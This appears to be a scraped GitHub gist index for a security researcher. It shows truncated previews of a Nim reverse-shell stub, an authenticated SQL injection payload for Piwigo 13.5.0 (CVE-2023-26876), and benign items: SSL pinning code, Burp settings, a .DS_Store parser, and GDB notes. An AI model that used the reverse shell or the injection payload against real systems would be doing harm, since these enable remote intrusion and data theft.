:shipit:
see no evil ~ learning..

(0xz41) rodnt
@rodnt
rodnt / rvshell.nim
Created September 23, 2022 02:36
Reverse shell Linux Nim
import osproc, net
#Author: m4ll3k
var
  sock = newSocket()
proc run(TARGET: string, RPORT: int): void =
  try:
    sock.connect(TARGET, PORT(RPORT))
@rodnt
rodnt / server.c
Created November 12, 2022 22:36
Simple C server for logging incoming connections.
#include <netdb.h>
/* --- server.c --- */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
=begin
author: unp4ck
usage:
$ gem install http
$ ruby metricsDumper.rb -u https://example.com/prometheus
=end
@rodnt
rodnt / Playground.swift
Created February 11, 2023 18:41
Custom SSLPinning iOS
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {
    if (challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust) {
        if let serverTrust = challenge.protectionSpace.serverTrust {
            var secresult = SecTrustResultType.invalid
            let status = SecTrustEvaluate(serverTrust, &secresult)
            if (errSecSuccess == status) {
                if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) {
                    let serverCertificateData = SecCertificateCopyData(serverCertificate)
                    let data = CFDataGetBytePtr(serverCertificateData);
@rodnt
rodnt / proof.md
Created April 18, 2023 14:03
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

@rodnt
rodnt / gist:962a0382a15fec71755a23bd7ad8294d
Created April 21, 2023 14:06
TLS Pass Through (Burp Suite) invisible captcha issues and some annoying services
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
.*\.google\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.googleapis\.com
.*\.pki\.goog
@rodnt
rodnt / ds_store.py
Created July 12, 2023 21:36
Parser for .ds_store files
# -*- encoding: utf-8 -*-
from ds_store import DSStore
from tqdm import tqdm
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", help="Path to the DS_Store file", required=True)
parser.add_argument("-t", "--type", help="Type : Iloc, bwsp, lsvp, lsvP, icvp", default='Iloc')
args = parser.parse_args()
@rodnt
rodnt / gdb.md
Created September 11, 2023 10:36
gdb - basics

How to use GDB (Basics)

  • Load the program
    • gdb <program>
  • Run the program
    • run
    • run with arguments
      • run arga argb argc ..
  • Breakpoint
@rodnt
rodnt / win11Pendrive.sh
Created December 2, 2023 10:20
Windows 11 bootable pendrive script
#!/bin/bash
# Function to select the USB device
select_usb_device() {
    echo "Available USB devices:"
    local devices=(/dev/sd*)
    select usb_device in "${devices[@]}"; do
        if [ -z "$usb_device" ]; then
            echo "Invalid selection, please try again."
        else